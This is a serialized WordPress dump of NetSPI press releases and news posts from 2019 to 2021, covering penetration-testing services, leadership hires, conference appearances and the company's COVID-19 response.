[post_title] => NetSPI Acquires Silent Break Security [post_excerpt] => With the acquisition of Silent Break Security, NetSPI will expand and enhance adversary simulation software and services. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-acquires-silent-break-security [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:52:36 [post_modified_gmt] => 2021-04-14 06:52:36 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=20550 [menu_order] => 226 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [45] => WP_Post Object ( [ID] => 19939 [post_author] => 91 [post_date] => 2020-10-21 07:00:00 [post_date_gmt] => 2020-10-21 07:00:00 [post_content] =>
Florindo Gallicchio and Robert Richardson bring a combined 50 years of cyber security experience to NetSPI.
Minneapolis, Minnesota  –  NetSPI, the leader in enterprise security testing and vulnerability management, today announced Florindo Gallicchio has joined as Managing Director and Robert Richardson has been promoted to Vice President of Customer Success. Expanding the leadership team is a principle component of NetSPI’s strategy to drive customer growth, program success, and return on investment (ROI) of penetration testing. “Finding vulnerabilities that other pentesters miss, making reporting easier to digest and act upon, and streamlining our customer engagements through the Resolve™ vulnerability management platform are key areas of focus for our team,” said Aaron Shilts, President at NetSPI. “The growth of our leadership team gives us the opportunity to evolve and expand our services, providing customers peace-of-mind that they’re working with the best security testing and vulnerability management team on the market today.” Cumulatively, Gallicchio and Richardson bring half a century of cyber security excellence to NetSPI, where they will help customers align security strategies to business goals.
  • Gallicchio  is a senior risk management and information security practitioner with over 30 years of experience in building and running cyber security programs to securely manage the business while also achieving and maintaining compliance to regulatory and industry requirements. As Managing Director at NetSPI, he will be a strategic advisor to executives, boards of directors, and technology staff, helping them understand the role of security as a business strategy. Prior to joining NetSPI, Gallicchio was the CISO at a global advisory investment firm in New York City. He began his career with the National Security Agency (NSA) while serving in the U.S. Navy, where in 10 years of service he worked in signals and communications intelligence collection and systems exploitation.
  • Richardson has more than 20 years of experience as a builder of people, processes, and sales enablement that support and drive sales growth. Richardson is being promoted to Vice President of Customer Success at NetSPI, and will focus on people leadership, personnel development, and operational efficiency. Prior to NetSPI, Richardson built a professional services process and delivery capability that resulted in 150% growth over two years as Director of Strategic Staffing and the Program Management Office (PMO) at Optiv Security. Prior to the merger that formed Optiv, Richardson managed projects at FishNet Security.
“Gallicchio and Richardson bring new perspectives to the table,” added Deke George, Founder and CEO of NetSPI. “Notably, Gallicchio’s experience on the client side as a financial services CISO and his time serving in the U.S. Navy coupled with Richardson’s personnel development track record and ability to scale operations will allow NetSPI to further improve our customers’ vulnerability management programs. Having two of the industry’s best minds on our roster is a crucial part of our mission to provide invaluable pentesting services and counsel to our clients – and continue to stay one step ahead of adversaries.” To learn more about NetSPI’s efforts to drive customer success, visit the company website to hear first-hand customer success stories or connect with the NetSPI team at info@netspi.com or call: (612) 465-8880.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn. Media Contact: Tori Norris, Maccabee PR for NetSPI tori@maccabee.com 612-294-3100 [post_title] => NetSPI Adds to Leadership Team to Support Continued Focus on Customer Success [post_excerpt] => Florindo Gallicchio and Robert Richardson bring a combined 50 years of cyber security experience to NetSPI. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-adds-to-leadership-team-to-support-continued-focus-on-customer-success [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:52:43 [post_modified_gmt] => 2021-04-14 06:52:43 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=19939 [menu_order] => 236 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [46] => WP_Post Object ( [ID] => 19512 [post_author] => 91 [post_date] => 2020-08-03 07:00:59 [post_date_gmt] => 2020-08-03 07:00:59 [post_content] =>

During the Black Hat 2020 Virtual Conference, NetSPI, a leader in enterprise security testing and vulnerability management, will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs. Today, there are more software-based solutions than ever before. From rising dependency on smartphone applications to the growing remote workforce increasing the usage of cloud-based software, reliance on software continues to grow. This means more AppSec security tools and automation have become available – and, in-turn, an overwhelming number of AppSec methodologies and approaches to follow. To navigate the complex security considerations, NetSPI is working to change the way organizations think about AppSec by embracing security throughout the development lifecycle.

Who: Deke George, CEO, NetSPI Aaron Shilts, President and COO, NetSPI Nabil Hannan, Managing Director, NetSPI Jake Reynolds, Product Manager, NetSPI What: On Wednesday, August 5, at 11:20–11:40am PT, NetSPI Managing Director Nabil Hannan and Product Manager Jake Reynolds will host a session titled, Extreme Makeover: AppSec Edition. During the session, attendees will learn how leading organizations use different discovery techniques as part of their AppSec program, understand strengths and weaknesses of common AppSec vulnerability discovery technologies and adopt techniques that make security frictionless for your developers as they embrace a DevSecOps culture. Additionally, they will discover how functional your application security program can be with a “makeover” to:
  • Enhance reporting to empower leadership to optimize AppSec programs
  • Improve vulnerability ingestion, correlation, and enrichment
  • Increase speed to remediation
The NetSPI team will have a virtual exhibitor booth in the Black Hat Business Hall. Schedule a briefing to hear the latest company updates and explore NetSPI’s new products and services, including:
  • Static Application Security Testing [SAST] and Secure Code Review [SCR]: Debuted at Black Hat, the new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
  • Strategic Advisory Services: In June 2020, NetSPI revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, business-objective driven, and mature application security program.
  • Pentesting as a Service (PTaaS): Launched in 2020, NetSPI’s PTaaS delivery model puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and adding the ability to perform always-on continuous testing.
When: Virtual Session: Wednesday, August 5, 11:20–11:40am PST Black Hat 2020 Virtual Conference: August 1-6, 2020 Where: Attend the virtual session, Extreme Makeover: AppSec Edition, online here. Stop by NetSPI’s virtual booth by searching for NetSPI in the Black Hat event portal. Media: Virtual briefings with the NetSPI team available upon request. To attend the virtual session on August 5, register for a free Black Hat Business Pass. Contact: Tori Norris Maccabee Public Relations on behalf of NetSPI tori@maccabee.com, (612) 294-3100 [post_title] => NetSPI to Help Black Hat USA 2020 Attendees View Penetration Testing and Application Security Through a New Lens [post_excerpt] => During the Black Hat 2020 Virtual Conference, NetSPI will provide a fresh perspective on optimizing pentesting and application security (AppSec) programs. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-help-black-hat-usa-2020-attendees-view-penetration-testing-application-security-through-new-lens [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:52:48 [post_modified_gmt] => 2021-04-14 06:52:48 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=19512 [menu_order] => 256 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [47] => WP_Post Object ( [ID] => 19437 [post_author] => 91 [post_date] => 2020-07-28 07:00:25 [post_date_gmt] => 2020-07-28 07:00:25 [post_content] =>
The new services are designed to identify application security vulnerabilities earlier in the software development life cycle.
Minneapolis, Minnesota  – To mitigate possible security vulnerabilities early in the fast-paced software development life cycle process, today NetSPI, the leader in enterprise security testing and vulnerability management, launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications. Key to NetSPI’s multi-level secure code review services involving SAST and SCR is a thorough inspection of source and compiled code to ensure security risks are eliminated before software is deployed to production, at which time the cost of remediation could increase exponentially. “With Continuous Integration/Continuous Deployment more and more becoming the backbone of the modern DevOps environment, it’s more important than ever to detect and address vulnerabilities through Static Application Security Testing and Source Code Review processes, a service that is complementary to an organization’s penetration testing efforts,” said Nabil Hannan, managing director at NetSPI. “Both testing functions enable more comprehensive vulnerability detection and, in many cases, identify vulnerabilities that are not possible to discover during dynamic testing and analysis.” NetSPI’s SAST and SCR services are offered in various engagement structures giving application and software development teams options to leverage the appropriate level of testing depth to detect, validate, and resolve security issues based on the business criticality and risk profile of their applications. The services are also a solution to adhere to application development compliance standards, including PCI DSS and HIPAA. NetSPI’s SAST and SCR offerings include:
  • Static Application Security Testing (SAST)—A static analysis performed with a combination of commercial, open source, and proprietary SAST tools, resulting in an assessment report from NetSPI that describes found vulnerabilities and actionable remediation guidance. Additionally, NetSPI offers a streamlined, more economical SAST service which focuses only on testing around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
  • Static Application Security Testing (SAST): Triaging—As an augmentation to an organization’s internal use of SAST tools in Application Security Programs, NetSPI offers triage services. By analyzing the data and assigning degrees of urgency on behalf of the security teams, NetSPI can validate the exploitability of vulnerabilities to remove any false positive findings, allowing development teams the time to focus exclusively on remediation.
  • Secure Code Review (SCR)—Building off the SAST offerings, NetSPI’s SCR offering employs cyber security experts to review underlying frameworks and libraries that are being leveraged to build the application. From there, manual testers identify vulnerabilities that automated scanners cannot detect, such as complex injection attacks, insecure error handling as well as authentication and authorization issues. Additionally, NetSPI offers a streamlined, more economical SCR service which focuses only on reporting around the Open Web Application Security Project® (OWASP) Top 10 vulnerabilities.
Unique to NetSPI is its instructor-led training program around secure coding and remediation for development teams, made available to clients after completion of Static Application Security Testing (SAST) or Secure Code Review (SCR) engagements. Available for up to a class size of 20, NetSPI’s one-day training details the top five categories of vulnerabilities identified in the SAST or SCR engagement and provides insights specific to that organization as well as remediation or mitigation techniques. “We’ve seen a movement to the left, in terms of prioritizing SCR earlier in the SDLC process as Application Security Programs have evolved,” said Hannan. “We support this strategic approach to security as it is critical to identify and remediate vulnerabilities, and in some cases even prevent them, during the software development phase.” Learn more about Secure Code Review (SCR) and Static Application Security Testing (SAST) from NetSPI online at netspi.com/security-testing/secure-code-review/ or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn. Contact: Tori Norris tori@maccabee.com 612-294-3100 [post_title] => NetSPI Brings Scale, Agility, and Speed to Static Application Security Testing and Secure Code Review [post_excerpt] => On July 28, 2020, we launched Static Application Security Testing (SAST) and Secure Code Review (SCR) services to aid application and software development teams in establishing a more strategic approach to building secure applications. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-brings-scale-agility-speed-static-application-security-testing-secure-code-review [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:52:53 [post_modified_gmt] => 2021-04-14 06:52:53 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=19437 [menu_order] => 259 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [48] => WP_Post Object ( [ID] => 19238 [post_author] => 91 [post_date] => 2020-06-30 07:00:16 [post_date_gmt] => 2020-06-30 07:00:16 [post_content] =>
The new offering will help CISOs and software developers/engineers navigate application security to promote cyber security program maturity.
Minneapolis, Minnesota  – Today, NetSPI, the leader in enterprise security testing and vulnerability management, revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, well-balanced, business-objective driven, and mature application security program. While advisory services are not new to NetSPI, the company saw an opportunity to use its breadth of knowledge in security testing to help define and guide organizations to implement application security into broader threat and vulnerability management programs. Through NetSPI’s Strategic Advisory Services, the company will share tangible and data-driven guidance on building or improving application security strategies and other software security initiatives. The three core functions and benefits of the new offering include:
  1. Program Benchmarking: Using real-world data, NetSPI’s program benchmarking services enable IT and security teams to evaluate program maturity against empirical data from the industry, measure and track the progress of security efforts objectively over time, compare security efforts with peers in the same business vertical, and ultimately help organizations adapt to current security best practices. Each benchmarking report will yield an evaluation of the current state of a company’s Application Security Program with details around focus areas for improvement along with areas that are currently addressing the organization’s Application Security needs effectively.
  2. Roadmap Development: Commonly performed alongside benchmarking, NetSPI’s roadmapping services define the future state of application security programs and the strategic path forward. The program roadmap will guide security stakeholders to determine the best approach to optimize application security investments by identifying unique organizational needs, leveraging established frameworks, and performing penetration tests to allow for early discovery of the types of vulnerabilities that exist while determining realistic goals and defining an appropriate timeline around key milestones.
  3. Security Metrics Development: Metrics, unlike raw data or measurements, can help answer specific business questions and help teams track progress. They are a critical component for measuring ROI of security programs, but organizations often lack the proper metrics to evaluate how application security efforts are influencing and helping achieve its business objectives. With NetSPI’s security metrics services, organizations will work with a consultant to define metrics that can be automated by leveraging existing business processes and raw data to provide necessary context to make effective business decisions.
“Given how fast application development techniques and methodologies are transforming, companies need to ensure that their security practices are staying current with the ever-evolving pressures around compliance and governance, software deployment, DevOps, Software Development Lifecycle (SDLC), and training,” said Nabil Hannan, managing director at NetSPI. “Understanding the current level of maturity and developing a data-driven plan to evolve your application security program is key to the success of your organization’s security efforts.” Learn more about Strategic Advisory Services from NetSPI online at Strategic Advisory or email heather.rubash@netspi.com to schedule an introductory call with Nabil Hannan, Managing Director at NetSPI.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track, and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn. [post_title] => NetSPI Reimagines Strategic Advisory Services, With a Focus on Application Security [post_excerpt] => On June 30, 2020, we revealed a new application-centric approach to its Strategic Advisory Services to help organizations gain a competitive edge through a formalized, well-balanced, business-objective driven, and mature application security program. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-reimagines-strategic-advisory-services-focus-application-security [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:52:58 [post_modified_gmt] => 2021-04-14 06:52:58 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=19238 [menu_order] => 265 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [49] => WP_Post Object ( [ID] => 17790 [post_author] => 91 [post_date] => 2020-03-17 07:00:33 [post_date_gmt] => 2020-03-17 07:00:33 [post_content] =>
On March 17, 2020, we shared the below communication with our customers in regards to COVID-19, and wanted to make it available to the broader community.
Minneapolis, Minnesota  –  During these unprecedented times, our team wanted to reach out, first and foremost, to wish you continued health and safety. In addition, we wanted to share how we are responding to the evolving COVID-19 situation through ongoing business continuity planning and our flexible approach to move forward with your penetration testing while also protecting your critical infrastructure.

NetSPI's Business Continuity Planning

We run business continuity planning exercises regularly, and recently performed a special exercise to simulate additional work-from-home load. All systems performed well in this test and validated our resiliency in a situation where all physical NetSPI offices are closed. In addition, our Resolve™ platform is crucial to our resiliency in that it allows our team of testers and project managers to communicate seamlessly with your team ensuring you can prioritize and fix your vulnerabilities faster.

Flexibility to Protect Your Critical Infrastructure

NetSPI is extremely flexible and our testing is built to ensure we do not impact your critical infrastructure. As such, we can:

  • Perform off-hours testing.
  • Modify the configuration of our tools (tweak our systems to go lower and slower than normal).
  • Conduct testing in QA and dev environments for pre-production application testing.

Employee Health and Travel

The health and safety of our employees is our primary concern. We are following CDC, state, and local guidelines for our staff and office closures. As a global organization, we have always supported a strong virtual infrastructure for team collaboration. At this time, most of our client interaction is taking place over email, phone, and video conference. We continue to focus on exceeding expectations, maintaining connectivity, and ensuring continued contact with all clients to answer questions and manage your testing needs. NetSPI is a strong, healthy business and team. Our clients can be confident leveraging our testing expertise which will continue without interruption. You are the backbone of our business and we thank you for your continued partnership and confidence. If you have specific questions about a project, please reach out to your sales or PMO contact. If you would like to speak directly to someone on our Executive Team, please feel free to contact me directly. We appreciate your business and look forward to continuing to serve you. Aaron Shilts President & COO Aaron.Shilts@NetSPI.com C: 612-326-4018 [post_title] => NetSPI Response to COVID-19 [post_excerpt] => On March 17, 2020, we shared the below communication with our customers in regards to COVID-19, and wanted to make it available to the broader community. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-response-to-covid-19 [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:53:04 [post_modified_gmt] => 2021-04-14 06:53:04 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=17790 [menu_order] => 306 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [50] => WP_Post Object ( [ID] => 16655 [post_author] => 91 [post_date] => 2020-02-17 07:00:15 [post_date_gmt] => 2020-02-17 07:00:15 [post_content] =>
PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.
Minneapolis, Minnesota  –  NetSPI, the leader in enterprise security testing and vulnerability management, today debuted its new delivery model, Penetration Testing as a Service (PTaaS) powered by the Resolve™ platform. PTaaS puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and adding the ability to perform always-on continuous testing. Taking note of customer needs and emerging attack surfaces, NetSPI has leveraged its knowledge in traditional, point-in-time pentests to develop a scalable, always-on model for enterprise security testing. NetSPI PTaaS delivers program level security testing comprised of an expert manual pentesting team enhanced by automation. “During our 20 years of penetration testing, our clients have consistently asked for guidance to understand, report on, and remediate their security vulnerabilities. While we’ve been excited to provide this assistance, we also knew there was more we could do to meet all our clients’ needs, which led to the creation of PTaaS,” said NetSPI President and Chief Operating Officer, Aaron Shilts. “As a leader in the cybersecurity industry, our experts have always found vulnerabilities that others miss, but PTaaS allows us to go a step further – delivering clear, actionable recommendations to our customers, enabling them to find and fix their vulnerabilities faster.” According to Gartner, “although separate from VA, penetration testing plays an important role in the prioritization and assessment of vulnerabilities from Gartner’s RBVM (risk-based vulnerability management) methodology. These services are testing your environment, with real-world skills and knowledge of the prevailing threat landscape. Security leaders need to take these recommendations and apply it directly in your security programs to address their prioritized findings.”* NetSPI believes PTaaS powered by Resolve™ solves critical cybersecurity challenges, by enabling:
  • Real-time accessible reporting: Gone are the days of managing multiple static PDF reports with out-of-date vulnerability information. With PTaaS powered by Resolve™, organizations can access their data in real-time as vulnerabilities are found by the NetSPI team of experts, and easily generate custom reports as desired.
  • Increased speed to remediation: PTaaS powered by Resolve™ helps organizations fix their vulnerabilities faster than traditional pentesting. Resolve™, a SaaS platform, will house all vulnerability data and provide remediation guidance for real-time access and assessment. In addition, customers can communicate with NetSPI security experts via the platform for additional clarity, to request remediation testing, or to scope a new engagement.
  • Continued manual testing: NetSPI’s team of highly skilled employees will continue its award-winning service of deep-dive manual penetration testing as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.
  • More testing: Organizations with a mature security program understand that point-in-time testing is not a viable model to continuously secure their applications and networks. New code and configurations are released every day, and PTaaS powered by the Resolve™ platform’s continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities easier and more efficiently.
Learn more about NetSPI PTaaS powered by Resolve™ at here or set up a 1:1 meeting at RSAC on February 24-28 online here. *Gartner “Market Guide for Vulnerability Assessment,” Craig Lawson, et al, 20 November 2019

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn. Media Contact Tori Norris Maccabee Public Relations Email: tori@maccabee.com Phone: (612) 294-3100 [post_title] => NetSPI Introduces Penetration Testing as a Service (PTaaS) Powered by Resolve™ [post_excerpt] => PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-introduces-penetration-testing-as-a-service-ptaas-powered-by-resolve [to_ping] => [pinged] => [post_modified] => 2021-04-14 06:54:00 [post_modified_gmt] => 2021-04-14 06:54:00 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=16655 [menu_order] => 314 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [51] => WP_Post Object ( [ID] => 16308 [post_author] => 91 [post_date] => 2020-02-04 07:00:34 [post_date_gmt] => 2020-02-04 07:00:34 [post_content] =>
NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™
Minneapolis, Minnesota  –  NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco. On February 24-28, the halls will be filled cybersecurity industry conversations, including expert-led sessions and keynotes, innovation programs, in-depth tutorials and trainings, expanded networking opportunities, product demos, and more. This year, the conference theme is “Human Element,” exploring our critical role in ensuring a safer, more secure future. During the conference, the NetSPI leadership team will be showcasing its new Penetration Testing as a Service (PTaaS) delivery service model powered by Resolve™.

Who:

Deke George, Founder and CEO at NetSPI Aaron Shilts, President and COO at NetSPI Charles Horton, SVP Client Services at NetSPI Jake Reynolds, Product Manager at NetSPI

What:

RSAC Exhibitor Booth – Meet the NetSPI team at booth #4201 to learn more about their expertise in penetration testing and vulnerability management. Get a first look and demo of PTaaS Powered by Resolve™. “Scaling Your Security Program with Penetration Testing as a Service” – Whether managing an annual penetration test, or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Visit booth S-1500 in the RSAC Briefing Center on Thursday, February 28 at 4:40pm PST to hear NetSPI Product Manager Jake Reynolds speak about how Penetration Testing as a Service scales and operationalizes continuous penetration testing in an ongoing, consumable fashion. View the full conference agenda here.

When:

February 24-29, 2020

Where:

Booth #4201 Moscone Center San Francisco, California

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top ten U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn. Media Contact Tori Norris Maccabee on behalf of NetSPI Email: tori@maccabee.com Phone: (612) 294-3100 [post_title] => NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™ [post_excerpt] => NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-heads-to-rsac-2020-to-showcase-and-demo-pen-testing-as-a-service-ptaas-powered-by-resolve [to_ping] => [pinged] => [post_modified] => 2021-04-14 07:13:25 [post_modified_gmt] => 2021-04-14 07:13:25 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=16308 [menu_order] => 317 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [52] => WP_Post Object ( [ID] => 16211 [post_author] => 91 [post_date] => 2020-01-21 07:00:32 [post_date_gmt] => 2020-01-21 07:00:32 [post_content] =>
Hannan brings 13 years’ cyber security experience to help NetSPI clients overcome vulnerability management challenges.
Minneapolis, Minnesota  –  NetSPI, a leader in enterprise security testing and vulnerability management, has added Nabil Hannan as Managing Director, where he will work with NetSPI clients on strategic security solutions incorporating both technology and services. “NetSPI’s innovative technology and services are essential for any high performing security program,” said Aaron Shilts, NetSPI President and COO. “Strategically, we continue to strive to be at the leading edge of this industry, providing valuable, actionable guidance to our clients, and Nabil adds to our ability to do this. He will consult directly with our clients and advise them on how to solve their most critical cyber security challenges in 2020 and beyond.” Hannan comes to NetSPI with a deep background in building and improving effective software security initiatives, with expertise in the financial services sector. Most notably, in his 13 years of experience in cyber security consulting, he held a position at Cigital/Synopsys Software Integrity Group, where he identified, scoped, and delivered on software security projects, including architectural risk analysis, penetration testing, secure code review, malicious code detection, vulnerability remediation, and mobile security assessments. Hannan has also worked as a Product Manager at Research In Motion/BlackBerry and has managed several flagship initiatives and projects through the full software development life cycle. “Cyber security is more critical today than ever before. We’ve all seen news of breaches in the headlines and may have even been affected by these breaches personally,” said Nabil Hannan, NetSPI Managing Director. “I look forward to advising NetSPI’s prestigious client base and helping companies protect their organizations, strategic assets, and valuable intellectual property. My role will also support NetSPI’s vision to help organizations build and maintain strong threat and vulnerability management programs – leveraging both technology and human capital.” Learn more about NetSPI’s Advisory Services at https://netspi.com/services/strategic-advisory/ or connect with Nabil on Twitter or LinkedIn.

About NetSPI

NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on FacebookTwitter, and LinkedIn. Media Contact Tori Norris Maccabee Public Relations Email: tori@maccabee.com Phone: (612) 294-3100 [post_title] => NetSPI Adds Seasoned Security Expert Nabil Hannan to Its Team [post_excerpt] => Hannan brings 13 years’ cyber security experience to help NetSPI clients overcome vulnerability management challenges. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => netspi-adds-seasoned-security-expert-nabil-hannan-to-its-team [to_ping] => [pinged] => [post_modified] => 2021-04-14 07:11:03 [post_modified_gmt] => 2021-04-14 07:11:03 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=news&p=16211 [menu_order] => 319 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [53] => WP_Post Object ( [ID] => 15848 [post_author] => 91 [post_date] => 2020-01-14 07:00:02 [post_date_gmt] => 2020-01-14 07:00:02 [post_content] =>

Over the past 20 years of working with companies of all sizes and ages, NetSPI has seen some of the best and worst infosec programs. No matter what stage you’re in with developing your program, keep these three best practices in mind today to set your team and company up for success tomorrow.

Scalability First

Build scalability into every strategy and program.Ask yourself “Will this scale?” at every step. It’s very easy to paint yourself into a corner focusing on a tactical solution when a security alert or emergency occurs, so take a minute to stop and think if your solution is going to scale if it is implemented company wide. If your “solution” is not scalable, you may end up with two- or three-times the work and expense later, so try to quantify the lifetime impact of your decision upfront.

Another scalability-related tip is to plan to be successful from the outset. Choose scalable tools and processes, supported by flexible staffing, to help manage growth efficiently.

Be Flexible

Find a balance between repeatability and consistency vs. flexibility and agile ingenuity. Some processes need to be rigid and consistent, while some can be more freeform. In the past, we’ve tried to engineer a process to enforce a set of constraints only to learn that it did not really matter or mitigate risk. In the security community we tend to look for ways to make processes repeatable and remove their dynamics,but by doing so, we sometimes lose the intended purpose of the activity. It’s more art than science, but finding a balance between flexibility and rigidity is important.

Plan for Communication and Collaboration

Many problemscan be traced back to miscommunicationand misunderstanding of what is usually a technical topic by people that do not have technical expertise. As such, planning for communication and collaboration in the early stages of building out your program is critical.

Keep in mind that people interpret words differently. Scan, assessment, risk, and vulnerability have different meanings to different people and resulted in some miscommunication issues and differing expectations. Take a step back to clearly define those terms and ensure everyone is on the same page.

[post_title] => Three Things To Remember When Building Your InfoSec Program [post_excerpt] => Over the past 20 years of working with companies of all sizes and ages, NetSPI has seen some of the best and worst infosec programs. [post_status] => publish [comment_status] => open [ping_status] => open [post_password] => [post_name] => three-things-to-remember-when-building-your-infosec-program [to_ping] => [pinged] => [post_modified] => 2021-04-14 00:56:19 [post_modified_gmt] => 2021-04-14 00:56:19 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=15848 [menu_order] => 320 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [54] => WP_Post Object ( [ID] => 13214 [post_author] => 91 [post_date] => 2019-07-31 07:00:03 [post_date_gmt] => 2019-07-31 07:00:03 [post_content] => Minneapolis, Minnesota  –  NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2019, Aug. 7-8 (booth #105) in Las Vegas, NV. NetSPI will present and exhibit at the conference to showcase vulnerability management and penetration testing solutions that improve an organization’s information security posture. NetSPI’s security experts will provide best practices and insights during their presentations and will also be available to meet 1:1. Schedule a session now.

Presentations at NetSPI Booth #105

Attacking Modern Environments through SQL Server with PowerUpSQL

